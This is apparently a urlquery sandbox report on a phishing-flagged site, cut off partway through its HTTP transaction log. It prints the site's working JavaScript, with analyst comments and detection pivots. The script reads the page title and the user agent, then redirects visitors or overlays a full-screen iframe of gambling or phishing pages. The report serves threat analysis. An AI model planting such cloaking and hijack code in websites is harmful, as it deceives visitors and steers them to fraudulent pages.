Overview

URL https://www.mcvhj.com/index
IP 23.245.91.190
ASN AS18978 Enzu Inc
Location United States
Report completed 2019-04-24 17:56:13 CEST
urlquery Alerts No alerts detected


Settings

UserAgent Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Referer
Pool
Access Level


Intrusion Detection Systems

Suricata w/ Emerging Threats Pro  No alerts detected


Blacklists

MDL  No alerts detected
OpenPhish  No alerts detected
PhishTank  No alerts detected
Fortinet's Web Filter
Added / Verified Severity Host Comment
2019-04-24 2 www.mcvhj.com/index Phishing
2019-04-24 2 www.mcvhj.com/js/jquery.3.5.2.min.m.js Phishing
2019-04-24 2 www.mcvhj.com/gg/biwei/index.html Phishing
DNS-BH  No alerts detected
mnemonic secure dns  No alerts detected


Recent reports on same IP/ASN/Domain

Last 2 reports on IP: 23.245.91.190

Date UQ / IDS / BL URL IP
2019-02-22 10:33:29 +0100
0 - 0 - 4 www.mcvhj.com/index 23.245.91.190
2018-11-29 13:44:30 +0100
0 - 0 - 3 mcvhj.com/index 23.245.91.190

Last 10 reports on ASN: AS18978 Enzu Inc

Date UQ / IDS / BL URL IP
2019-06-25 05:10:54 +0200
0 - 1 - 0 accelcheck.com 23.88.207.178
2019-06-18 22:41:45 +0200
0 - 0 - 0 d4rkbbs.site/ 23.89.49.145
2019-06-13 03:26:41 +0200
1 - 0 - 0 musiconline.mrface.com 172.246.160.83
2019-06-13 03:19:41 +0200
1 - 0 - 0 musiconline.mrface.com 172.246.160.83
2019-06-12 23:34:58 +0200
0 - 0 - 0 198.71.81.66 198.71.81.66
2019-06-11 13:35:09 +0200
1 - 0 - 0 musiconline.mrface.com 172.246.160.83
2019-06-11 13:35:07 +0200
1 - 0 - 0 musiconline.mrface.com 172.246.160.83
2019-06-11 13:35:06 +0200
1 - 0 - 0 musiconline.mrface.com 172.246.160.83
2019-06-11 00:33:10 +0200
0 - 0 - 3 dbhadley.com/ 107.183.84.131
2019-06-10 23:01:42 +0200
0 - 0 - 37 samhuds.com/wishlist/index/add/product/1045/f (...) 198.71.84.196

No other reports on domain: mcvhj.com



JavaScript

Executed Scripts (5)


Executed Evals (1)

#1 JavaScript::Eval (size: 10724, repeated: 1) - SHA256: b2d356e932f07665575e2941366eec0fa48f15f7b341a53c4c4bea398faefd94

                                        // Analyst note: client-side fingerprint that feeds the title-keyword cloaking
                                        // logic which follows it. This part makes no network requests; it only computes
                                        // the values the branching reads.
                                        var a = document.title,
    b = {
        versions: function() {
            // Plain substring checks on the raw User-Agent string.
            var d = navigator.userAgent;
            return {
                trident: -1 < d.indexOf("Trident"),
                presto: -1 < d.indexOf("Presto"),
                webKit: -1 < d.indexOf("AppleWebKit"),
                gecko: -1 < d.indexOf("Gecko") && -1 == d.indexOf("KHTML"),
                // "mobile" is the only one of these flags the redirect chain reads.
                mobile: !!d.match(/AppleWebKit.*Mobile.*/),
                ios: !!d.match(/\(i[^;]+;( U;)? CPU.+Mac OS X/),
                // Any UA containing "Linux" (desktop Linux included) is classed as Android here.
                android: -1 < d.indexOf("Android") || -1 < d.indexOf("Linux"),
                iPhone: -1 < d.indexOf("iPhone"),
                iPad: -1 < d.indexOf("iPad"),
                // True simply when "Safari" is absent from the UA.
                webApp: -1 == d.indexOf("Safari")
            }
        }(),
        // Legacy IE property first, then the standard one; not referenced elsewhere in this eval.
        language: (navigator.browserLanguage || navigator.language).toLowerCase()
    },
    // Page title, lower-cased with all whitespace removed: the key matched against brand keywords.
    c = a.toLowerCase().replace(/\s/gi, ""),
    useragent = navigator.userAgent.toLowerCase();
// Analyst note: cloaking/redirect dispatcher keyed on the stripped page title (c) and the
// mobile flag computed above. Mobile branch: a User-Agent containing "baidu" gets a
// full-viewport iframe of /gg/m/index.html written over the page; otherwise brand keywords
// (Latin and Chinese spellings of what appear to be gambling brands) map to
// window.location.href = "/gg/m/from/<brand>.php" or /gg/m/index.html, defaulting to
// /gg/m/index.html. Desktop branch: every keyword match hides vertical overflow and
// document.write()s an absolutely positioned, maximal z-index div containing an iframe of
// /gg/<brand>/index.html; the final fallback is /gg/in/index.html.
// Detection pivots: the /gg/ path prefix, document.write of a full-size fixed iframe, and the
// title-keyword gate. The title reported in the hm.gif beacon in this report contains
// "betway", which selects the /gg/biwei/index.html iframe that is also recorded under
// Executed Writes and flagged by Fortinet as Phishing.
b.versions.mobile ? -1 < useragent.indexOf("baidu") ? (document.documentElement.style.overflowY = "hidden", document.write('<div style="Z-INDEX:1000000000000000000;POSITION:absolute;TEXT-ALIGN:left;BACKGROUND-COLOR:#ffffff;WIDTH:100%;HEIGHT:100%; TOP:0px; RIGHT:0px;LEFT:0px;"><iframe frameborder="no" src="/gg/m/index.html" style="height: 100%;width: 100%;position: fixed;left:0; top:0;"></iframe></div>')) : -1 < c.indexOf("\u660e\u5347") || -1 < c.indexOf("m88") || -1 < c.indexOf("\u660e\u965e") ? window.location.href = "/gg/m/from/m88.php" : -1 < c.indexOf("\u5fc5\u5a01") || -1 < c.indexOf("betway") || -1 < c.indexOf("\u5fc5\u7ef4") ? window.location.href = "/gg/m/from/betway.php" : -1 < c.indexOf("vwin") || -1 < c.indexOf("\u5fb7\u8d62") ? window.location.href = "/gg/m/index.html" : -1 < c.indexOf("\u4e9a\u535a") || -1 < c.indexOf("yabo") || -1 < c.indexOf("\u4e9a\u640f") || -1 < c.indexOf("yabo88") ? window.location.href = "/gg/m/from/yabo.php" : -1 < c.indexOf("\u4e07\u535a") || -1 < c.indexOf("manbet") || -1 < c.indexOf("\u4e07\u640f") || -1 < c.indexOf("\u72d7\u4e07") ? window.location.href = "/gg/m/from/manbetx.php" : -1 < c.indexOf("188bet") || -1 < c.indexOf("\u91d1\u5b9d\u535a") || -1 < c.indexOf("\u91d1\u535a\u5b9d") || -1 < c.indexOf("\u91d1\u5b9d\u640f") ? window.location.href = "/gg/m/from/188bet.php" : -1 < c.indexOf("w88") || -1 < c.indexOf("\u4f18\u5fb7") ? window.location.href = "/gg/m/from/w88.php" : -1 < c.indexOf("sands") || -1 < c.indexOf("\u91d1\u838e") || -1 < c.indexOf("\u91d1\u6c99") ? window.location.href = "/gg/m/from/sands_x.php" : -1 < c.indexOf("weide") || -1 < c.indexOf("\u97e6\u5fb7") || -1 < c.indexOf("\u4f1f\u5fb7") || -1 < c.indexOf("betvictor") || -1 < c.indexOf("1946") ? window.location.href = "/gg/m/from/weide.php" : -1 < c.indexOf("raybet") || -1 < c.indexOf("\u96f7\u7ade\u6280") || -1 < c.indexOf("\u7535\u7ade") ? 
window.location.href = "/gg/m/index.html" : -1 < c.indexOf("\u5174\u53d1") || -1 < c.indexOf("\u5174\u767c") || -1 < c.indexOf("xf") ? window.location.href = "/gg/m/index.html" : -1 < c.indexOf("beplay") || -1 < c.indexOf("bepaly") ? window.location.href = "/gg/m/from/beplay.php" : -1 < c.indexOf("bob") ? window.location.href = "/gg/m/from/bob.php" : window.location.href = "/gg/m/index.html" : -1 < c.indexOf("\u5fc5\u5a01") || -1 < c.indexOf("betway") || -1 < c.indexOf("\u5fc5\u7ef4") ? (document.documentElement.style.overflowY = "hidden", document.write('<div style="Z-INDEX:1000000000000000000;POSITION:absolute;TEXT-ALIGN:left;BACKGROUND-COLOR:#ffffff;WIDTH:100%;HEIGHT:100%; TOP:0px; RIGHT:0px;LEFT:0px;"><iframe frameborder="no" src="/gg/biwei/index.html" style="height: 100%;width: 100%;position: fixed;left:0; top:0;"></iframe></div>')) : -1 < c.indexOf("vwin") || -1 < c.indexOf("\u5fb7\u8d62") ? (document.documentElement.style.overflowY = "hidden", document.write('<div style="Z-INDEX:1000000000000000000;POSITION:absolute;TEXT-ALIGN:left;BACKGROUND-COLOR:#ffffff;WIDTH:100%;HEIGHT:100%; TOP:0px; RIGHT:0px;LEFT:0px;"><iframe frameborder="no" src="/gg/in/index.html" style="height: 100%;width: 100%;position: fixed;left:0; top:0;"></iframe></div>')) : -1 < c.indexOf("\u4e9a\u535a") || -1 < c.indexOf("\u4e9a\u640f") || -1 < c.indexOf("yabo88") || -1 < c.indexOf("yabo") ? (document.documentElement.style.overflowY = "hidden", document.write('<div style="Z-INDEX:1000000000000000000;POSITION:absolute;TEXT-ALIGN:left;BACKGROUND-COLOR:#ffffff;WIDTH:100%;HEIGHT:100%; TOP:0px; RIGHT:0px;LEFT:0px;"><iframe frameborder="no" src="/gg/yb/index.html" style="height: 100%;width: 100%;position: fixed;left:0; top:0;"></iframe></div>')) : -1 < c.indexOf("\u4e07\u535a") || -1 < c.indexOf("manbet") || -1 < c.indexOf("\u4e07\u640f") || -1 < c.indexOf("\u72d7\u4e07") ? 
(document.documentElement.style.overflowY = "hidden", document.write('<div style="Z-INDEX:1000000000000000000;POSITION:absolute;TEXT-ALIGN:left;BACKGROUND-COLOR:#ffffff;WIDTH:100%;HEIGHT:100%; TOP:0px; RIGHT:0px;LEFT:0px;"><iframe frameborder="no" src="/gg/manbetx/index.html" style="height: 100%;width: 100%;position: fixed;left:0; top:0;"></iframe></div>')) : -1 < c.indexOf("w88") || -1 < c.indexOf("\u4f18\u5fb7") || -1 < c.indexOf("\u5fe7\u5fb7") ? (document.documentElement.style.overflowY = "hidden", document.write('<div style="Z-INDEX:1000000000000000000;POSITION:absolute;TEXT-ALIGN:left;BACKGROUND-COLOR:#ffffff;WIDTH:100%;HEIGHT:100%; TOP:0px; RIGHT:0px;LEFT:0px;"><iframe frameborder="no" src="/gg/w88/index.html" style="height: 100%;width: 100%;position: fixed;left:0; top:0;"></iframe></div>')) : -1 < c.indexOf("weide") || -1 < c.indexOf("\u4f1f\u5fb7") || -1 < c.indexOf("\u97e6\u5fb7") || -1 < c.indexOf("BETVICTOR") ? (document.documentElement.style.overflowY = "hidden", document.write('<div style="Z-INDEX:1000000000000000000;POSITION:absolute;TEXT-ALIGN:left;BACKGROUND-COLOR:#ffffff;WIDTH:100%;HEIGHT:100%; TOP:0px; RIGHT:0px;LEFT:0px;"><iframe frameborder="no" src="/gg/weide/index.html" style="height: 100%;width: 100%;position: fixed;left:0; top:0;"></iframe></div>')) : -1 < c.indexOf("\u91d1\u6c99") || -1 < c.indexOf("sands") || -1 < c.indexOf("\u91d1\u838e") ? (document.documentElement.style.overflowY = "hidden", document.write('<div style="Z-INDEX:1000000000000000000;POSITION:absolute;TEXT-ALIGN:left;BACKGROUND-COLOR:#ffffff;WIDTH:100%;HEIGHT:100%; TOP:0px; RIGHT:0px;LEFT:0px;"><iframe frameborder="no" src="/gg/sands/index.html" style="height: 100%;width: 100%;position: fixed;left:0; top:0;"></iframe></div>')) : -1 < c.indexOf("\u91d1\u5b9d\u640f") || -1 < c.indexOf("188bet") || -1 < c.indexOf("\u91d1\u535a\u5b9d") || -1 < c.indexOf("\u91d1\u5b9d\u535a") ? 
(document.documentElement.style.overflowY = "hidden", document.write('<div style="Z-INDEX:1000000000000000000;POSITION:absolute;TEXT-ALIGN:left;BACKGROUND-COLOR:#ffffff;WIDTH:100%;HEIGHT:100%; TOP:0px; RIGHT:0px;LEFT:0px;"><iframe frameborder="no" src="/gg/188bet/index.html" style="height: 100%;width: 100%;position: fixed;left:0; top:0;"></iframe></div>')) : -1 < c.indexOf("raybet") || -1 < c.indexOf("\u96f7\u7ade\u6280") || -1 < c.indexOf("\u7535\u7ade") ? (document.documentElement.style.overflowY = "hidden", document.write('<div style="Z-INDEX:1000000000000000000;POSITION:absolute;TEXT-ALIGN:left;BACKGROUND-COLOR:#ffffff;WIDTH:100%;HEIGHT:100%; TOP:0px; RIGHT:0px;LEFT:0px;"><iframe frameborder="no" src="/gg/in/index.html" style="height: 100%;width: 100%;position: fixed;left:0; top:0;"></iframe></div>')) : -1 < c.indexOf("\u5174\u53d1") || -1 < c.indexOf("\u5174\u767c") || -1 < c.indexOf("xf") ? (document.documentElement.style.overflowY = "hidden", document.write('<div style="Z-INDEX:1000000000000000000;POSITION:absolute;TEXT-ALIGN:left;BACKGROUND-COLOR:#ffffff;WIDTH:100%;HEIGHT:100%; TOP:0px; RIGHT:0px;LEFT:0px;"><iframe frameborder="no" src="/gg/in/index.html" style="height: 100%;width: 100%;position: fixed;left:0; top:0;"></iframe></div>')) : -1 < c.indexOf("beplay") || -1 < c.indexOf("bepaly") ? (document.documentElement.style.overflowY = "hidden", document.write('<div style="Z-INDEX:1000000000000000000;POSITION:absolute;TEXT-ALIGN:left;BACKGROUND-COLOR:#ffffff;WIDTH:100%;HEIGHT:100%; TOP:0px; RIGHT:0px;LEFT:0px;"><iframe frameborder="no" src="/gg/beplay/index.html" style="height: 100%;width: 100%;position: fixed;left:0; top:0;"></iframe></div>')) : -1 < c.indexOf("ltt") || -1 < c.indexOf("\u4e50\u5929\u5802") || -1 < c.indexOf("fun88") ? 
(document.documentElement.style.overflowY = "hidden", document.write('<div style="Z-INDEX:1000000000000000000;POSITION:absolute;TEXT-ALIGN:left;BACKGROUND-COLOR:#ffffff;WIDTH:100%;HEIGHT:100%; TOP:0px; RIGHT:0px;LEFT:0px;"><iframe frameborder="no" src="/gg/to/fun88/index.html" style="height: 100%;width: 100%;position: fixed;left:0; top:0;"></iframe></div>')) : -1 < c.indexOf("\u660e\u5347") || -1 < c.indexOf("m88") || -1 < c.indexOf("\u660e\u965e") ? (document.documentElement.style.overflowY = "hidden", document.write('<div style="Z-INDEX:1000000000000000000;POSITION:absolute;TEXT-ALIGN:left;BACKGROUND-COLOR:#ffffff;WIDTH:100%;HEIGHT:100%; TOP:0px; RIGHT:0px;LEFT:0px;"><iframe frameborder="no" src="/gg/to/m88/index.html" style="height: 100%;width: 100%;position: fixed;left:0; top:0;"></iframe></div>')) : -1 < c.indexOf("\u9e3f\u8fd0") || -1 < c.indexOf("hv") ? (document.documentElement.style.overflowY = "hidden", document.write('<div style="Z-INDEX:1000000000000000000;POSITION:absolute;TEXT-ALIGN:left;BACKGROUND-COLOR:#ffffff;WIDTH:100%;HEIGHT:100%; TOP:0px; RIGHT:0px;LEFT:0px;"><iframe frameborder="no" src="/gg/to/hv/index.html" style="height: 100%;width: 100%;position: fixed;left:0; top:0;"></iframe></div>')) : -1 < c.indexOf("12bet") || -1 < c.indexOf("12\u535a") || -1 < c.indexOf("\u58f9\u8d30\u535a") || -1 < c.indexOf("\u4e00\u4e8c\u535a") || -1 < c.indexOf("12bo") ? (document.documentElement.style.overflowY = "hidden", document.write('<div style="Z-INDEX:1000000000000000000;POSITION:absolute;TEXT-ALIGN:left;BACKGROUND-COLOR:#ffffff;WIDTH:100%;HEIGHT:100%; TOP:0px; RIGHT:0px;LEFT:0px;"><iframe frameborder="no" src="/gg/to/12bet/index.html" style="height: 100%;width: 100%;position: fixed;left:0; top:0;"></iframe></div>')) : -1 < c.indexOf("letou") || -1 < c.indexOf("\u4e50\u6295") || -1 < c.indexOf("bet16") || -1 < c.indexOf("\u745e\u4e30") ? 
(document.documentElement.style.overflowY = "hidden", document.write('<div style="Z-INDEX:1000000000000000000;POSITION:absolute;TEXT-ALIGN:left;BACKGROUND-COLOR:#ffffff;WIDTH:100%;HEIGHT:100%; TOP:0px; RIGHT:0px;LEFT:0px;"><iframe frameborder="no" src="/gg/to/letou/index.html" style="height: 100%;width: 100%;position: fixed;left:0; top:0;"></iframe></div>')) : -1 < c.indexOf("bob") ? (document.documentElement.style.overflowY = "hidden", document.write('<div style="Z-INDEX:1000000000000000000;POSITION:absolute;TEXT-ALIGN:left;BACKGROUND-COLOR:#ffffff;WIDTH:100%;HEIGHT:100%; TOP:0px; RIGHT:0px;LEFT:0px;"><iframe frameborder="no" src="/gg/bob/index.html" style="height: 100%;width: 100%;position: fixed;left:0; top:0;"></iframe></div>')) : (document.documentElement.style.overflowY = "hidden", document.write('<div style="Z-INDEX:1000000000000000000;POSITION:absolute;TEXT-ALIGN:left;BACKGROUND-COLOR:#ffffff;WIDTH:100%;HEIGHT:100%; TOP:0px; RIGHT:0px;LEFT:0px;"><iframe frameborder="no" src="/gg/in/index.html" style="height: 100%;width: 100%;position: fixed;left:0; top:0;"></iframe></div>'));
// Analyst note: what appears to be a standard Baidu Tongji (hm.baidu.com) analytics loader.
// The site id in the query string is the same one carried by the hm.gif beacon in the
// HTTP transactions of this report, so it is a useful pivot for clustering related landing pages.
var _hmt = _hmt || [];
(function() {
    var d = document.createElement("script");
    d.src = "https://hm.baidu.com/hm.js?0f203c4517203805d75d02036cd6d835";
    // Inserts the tracker ahead of the first <script> element already in the document.
    var e = document.getElementsByTagName("script")[0];
    e.parentNode.insertBefore(d, e)
})();
                                    

Executed Writes (1)

#1 JavaScript::Write (size: 284, repeated: 1) - SHA256: a8ac8cb2b5d9b6f76025e8e0287cbb02de45e39052971663c96231f985a4095b

                                        < div style = "Z-INDEX:1000000000000000000;POSITION:absolute;TEXT-ALIGN:left;BACKGROUND-COLOR:#ffffff;WIDTH:100%;HEIGHT:100%; TOP:0px; RIGHT:0px;LEFT:0px;" > < iframe frameborder = "no"
src = "/gg/biwei/index.html"
style = "height: 100%;width: 100%;position: fixed;left:0; top:0;" > < /iframe></div >
                                    


HTTP Transactions (18)


Request Response
                                        
                                            POST / HTTP/1.1 
Host: ocsp.int-x3.letsencrypt.org
                                        
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Content-Length: 117
Content-Type: application/ocsp-request

                                         
                                         91.135.34.19
HTTP/1.1 200 OK
Content-Type: application/ocsp-response
                                        
Server: nginx
Content-Length: 527
Etag: "52B00BC815A195508D6138202F6466CBA2215586F1C011415D1A1A240518491A"
Last-Modified: Tue, 23 Apr 2019 16:00:00 UTC
Cache-Control: public, no-transform, must-revalidate, max-age=43200
Expires: Thu, 25 Apr 2019 03:55:41 GMT
Date: Wed, 24 Apr 2019 15:55:41 GMT
Connection: keep-alive


--- Additional Info ---
Magic:  data
Size:   527
Md5:    04e0a28e44f679fcac0d55ee2b85aa68
Sha1:   3cb7e1a9b99564e2e0a375415b0f173bcc8dc607
Sha256: 52b00bc815a195508d6138202f6466cba2215586f1c011415d1a1a240518491a
                                        
                                            POST / HTTP/1.1 
Host: isrg.trustid.ocsp.identrust.com
                                        
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Content-Length: 115
Content-Type: application/ocsp-request

                                         
                                         91.135.34.26
HTTP/1.1 200 OK
Content-Type: application/ocsp-response
                                        
Content-Transfer-Encoding: Binary
Last-Modified: Mon, 22 Apr 2019 22:33:43 GMT
Etag: "080da9c909813bebaf1c03aa5ea9dbb88e6fbf78"
Content-Length: 1398
Cache-Control: public, no-transform, must-revalidate, max-age=33154
Expires: Thu, 25 Apr 2019 01:08:15 GMT
Date: Wed, 24 Apr 2019 15:55:41 GMT
Connection: keep-alive


--- Additional Info ---
Magic:  data
Size:   1398
Md5:    b6cc94c6bd8c7978a77c574a6d35a768
Sha1:   080da9c909813bebaf1c03aa5ea9dbb88e6fbf78
Sha256: abee6a1e296832c5af69e4220408b78efed2e6faea82d04ebd2ef44991ee6d60
                                        
                                            GET /index HTTP/1.1 
Host: www.mcvhj.com
                                        
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive

                                         
                                         23.245.91.190
HTTP/1.1 200 OK
Content-Type: text/html;charset=utf-8
                                        
Server: nginx
Date: Wed, 24 Apr 2019 16:01:40 GMT
Transfer-Encoding: chunked
Connection: keep-alive
Vary: Accept-Encoding
Content-Encoding: gzip


--- Additional Info ---
Magic:  gzip compressed data, from Unix
Size:   228
Md5:    b4505480496a6998a3de96b5ca3c50ce
Sha1:   77a971931d37a9ef6064e8bb0b54bc69b25ed103
Sha256: 0a2307b85f1adb446dfb12b48d247751d8b1d12749ad5bfff0fd65607f0316bd

Alerts:
  Blacklists:
    - fortinet: Phishing
                                        
                                            GET /js/jquery.3.5.2.min.m.js HTTP/1.1 
Host: www.mcvhj.com
                                        
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: https://www.mcvhj.com/index

                                         
                                         23.245.91.190
HTTP/1.1 200 OK
Content-Type: application/javascript
                                        
Server: nginx
Date: Wed, 24 Apr 2019 16:01:41 GMT
Content-Length: 6429
Last-Modified: Wed, 24 Apr 2019 08:45:29 GMT
Connection: keep-alive
Etag: "5cc02229-191d"
Accept-Ranges: bytes


--- Additional Info ---
Magic:  ASCII text, with very long lines
Size:   6429
Md5:    e0057856326af4bb536fc7b41dd1b317
Sha1:   e80fdf5a6dc8e59a4282bd1cfbca7e74e641f435
Sha256: 4e141420ba40d1c14dae15260014d5d94198271e4ff5d3f88be6e9163e976b22

Alerts:
  Blacklists:
    - fortinet: Phishing
                                        
                                            GET /gg/biwei/index.html HTTP/1.1 
Host: www.mcvhj.com
                                        
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: https://www.mcvhj.com/index

                                         
                                         23.245.91.190
HTTP/1.1 200 OK
Content-Type: text/html
                                        
Server: nginx
Date: Wed, 24 Apr 2019 16:01:41 GMT
Last-Modified: Wed, 24 Apr 2019 08:45:29 GMT
Transfer-Encoding: chunked
Connection: keep-alive
Vary: Accept-Encoding
Etag: W/"5cc02229-43fc"
Content-Encoding: gzip


--- Additional Info ---
Magic:  gzip compressed data, from Unix
Size:   3988
Md5:    7e807ee6db7a63d89d81444c271d2de1
Sha1:   71cb3beb87516e06f9421f645877544925d6ce65
Sha256: 70e97c90ba73fa48eac55614df20999a252f11a47f6b06f7d308982022b2a583

Alerts:
  Blacklists:
    - fortinet: Phishing
                                        
                                            POST /gsorganizationvalsha2g2 HTTP/1.1 
Host: ocsp2.globalsign.com
                                        
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Content-Length: 111
Content-Type: application/ocsp-request

                                         
                                         104.18.20.226
HTTP/1.1 200 OK
Content-Type: application/ocsp-response
                                        
Date: Wed, 24 Apr 2019 15:55:42 GMT
Content-Length: 1574
Connection: keep-alive
Set-Cookie: __cfduid=dfe440af3a43924bca0e2f8bd31a09d7b1556121342; expires=Thu, 23-Apr-20 15:55:42 GMT; path=/; domain=.globalsign.com; HttpOnly
Expires: Sun, 28 Apr 2019 15:32:13 GMT
X-Powered-By: Undertow/1
Etag: "c73feca2996018cafe2a4a1723cbc38f0c117410"
Last-Modified: Wed, 24 Apr 2019 15:32:13 GMT
Cache-Control: public, no-transform, must-revalidate, s-maxage=3600
CF-Cache-Status: HIT
Accept-Ranges: bytes
Vary: Accept-Encoding
Server: cloudflare
CF-RAY: 4cc943589f15429d-OSL


--- Additional Info ---
Magic:  data
Size:   1574
Md5:    65c9d2729143c73beea75f1dea69c19b
Sha1:   c73feca2996018cafe2a4a1723cbc38f0c117410
Sha256: 2bbdc32db52f1ec91ecced8512bb9940c6d96ca711e7bfc61a6bb83265f2b260
                                        
                                            POST / HTTP/1.1 
Host: ocsp.int-x3.letsencrypt.org
                                        
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Content-Length: 117
Content-Type: application/ocsp-request

                                         
                                         91.135.34.19
HTTP/1.1 200 OK
Content-Type: application/ocsp-response
                                        
Server: nginx
Content-Length: 527
Etag: "AA5BD687A68B315B6A24ABEDFFBD80E10C27310206854FF77792ED8F0DC5659F"
Last-Modified: Mon, 22 Apr 2019 16:00:00 UTC
Cache-Control: public, no-transform, must-revalidate, max-age=43199
Expires: Thu, 25 Apr 2019 03:55:42 GMT
Date: Wed, 24 Apr 2019 15:55:43 GMT
Connection: keep-alive


--- Additional Info ---
Magic:  data
Size:   527
Md5:    5730eb9d881755fd6511c9946fd0f0c1
Sha1:   65679c06897346f469c3f0a22b25adc6265b4d6a
Sha256: aa5bd687a68b315b6a24abedffbd80e10c27310206854ff77792ed8f0dc5659f
                                        
                                            GET /biwei/css/foundation.min.css HTTP/1.1 
Host: www.wlovebaidu.com
                                        
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/css,*/*;q=0.1
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: https://www.mcvhj.com/gg/biwei/index.html

                                         
                                         27.255.64.13
HTTP/1.1 200 OK
Content-Type: text/css
                                        
Server: nginx
Date: Wed, 24 Apr 2019 15:55:18 GMT
Last-Modified: Mon, 17 Dec 2018 13:34:59 GMT
Transfer-Encoding: chunked
Connection: keep-alive
Vary: Accept-Encoding
Content-Encoding: gzip


--- Additional Info ---
Magic:  gzip compressed data, from Unix
Size:   12821
Md5:    a9ce6abbade1b2c44043b9208130530b
Sha1:   cb6c404bf6b9fec3f55c2dd70966b9b72c3c4912
Sha256: c105206b69d58989cb88b60b1b93e7b5c3fc7e93e337f4f3d930497f74208168
                                        
                                            GET /hm.js?0f203c4517203805d75d02036cd6d835 HTTP/1.1 
Host: hm.baidu.com
                                        
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: https://www.mcvhj.com/index

                                         
                                         103.235.46.191
HTTP/1.1 200 OK
Content-Type: application/javascript
                                        
Cache-Control: max-age=0, must-revalidate
Content-Encoding: gzip
Content-Length: 10381
Date: Wed, 24 Apr 2019 15:55:43 GMT
Etag: 9549e3e97d1eb81b7701e22c02e37cb5
P3p: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Server: apache
Set-Cookie: HMACCOUNT=A91EF2F2E757E669; Path=/; Domain=hm.baidu.com; Expires=Sun, 18 Jan 2038 00:00:00 GMT
Strict-Transport-Security: max-age=172800


--- Additional Info ---
Magic:  gzip compressed data, from Unix, max speed
Size:   10381
Md5:    0feeb2cf6a3fbce1a1645b17ab575595
Sha1:   39ab16366b4ee1941dbe16721517f8f2d79f1bb0
Sha256: 335c8b13463f70cc90d7bbe9a453ce84144f01c05c8c633fa7b4415d0f591cd3
                                        
                                            GET /biwei/css/bootstrap.min.css HTTP/1.1 
Host: www.wlovebaidu.com
                                        
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/css,*/*;q=0.1
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: https://www.mcvhj.com/gg/biwei/index.html

                                         
                                         27.255.64.13
HTTP/1.1 200 OK
Content-Type: text/css
                                        
Server: nginx
Date: Wed, 24 Apr 2019 15:55:18 GMT
Last-Modified: Mon, 17 Dec 2018 13:34:59 GMT
Transfer-Encoding: chunked
Connection: keep-alive
Vary: Accept-Encoding
Content-Encoding: gzip


--- Additional Info ---
Magic:  gzip compressed data, from Unix
Size:   24003
Md5:    41de576b95ff47aa730e7f21bfd5e3a6
Sha1:   f89798b3766b38f71b46ab3bfd3436a6a9fe1a11
Sha256: 5a3f6833d7f39cc52a53a9b3cb88e0898f1ea0025eacdb199db363d036e8649b
                                        
                                            GET /biwei/css/jquery.min.js HTTP/1.1 
Host: www.wlovebaidu.com
                                        
